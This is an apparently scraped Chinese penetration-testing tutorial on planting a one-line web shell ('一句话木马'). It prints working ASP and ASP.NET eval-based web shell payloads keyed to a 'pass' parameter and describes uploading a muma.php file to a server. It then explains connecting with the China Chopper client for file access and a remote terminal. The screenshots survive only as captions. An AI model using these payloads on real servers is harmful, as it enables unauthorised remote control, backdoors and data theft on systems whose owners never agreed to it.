上传一句话木马拿shell教程

0x00 前言

一句话木马:



ASP:    <%eval request("pass")%>

ASP.NET:    <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

原理:

php的eval()函数:eval($str)函数是把$str当做PHP代码执行。 

0x01 实战

  1. 创建muma.php 然后将复制进去上传一句话木马拿shell教程_第1张图片
  2. 然后上传到服务器中

上传一句话木马拿shell教程_第2张图片

3.上菜刀链接:

右击添加:

上传一句话木马拿shell教程_第3张图片

上传一句话木马拿shell教程_第4张图片

右击文件管理:

上传一句话木马拿shell教程_第5张图片

上传一句话木马拿shell教程_第6张图片

右击虚拟终端:

上传一句话木马拿shell教程_第7张图片

 

 

0x02 遇到的问题

在下图中,两个必须相同

上传一句话木马拿shell教程_第8张图片

上传一句话木马拿shell教程_第9张图片

你可能感兴趣的:(渗透测试)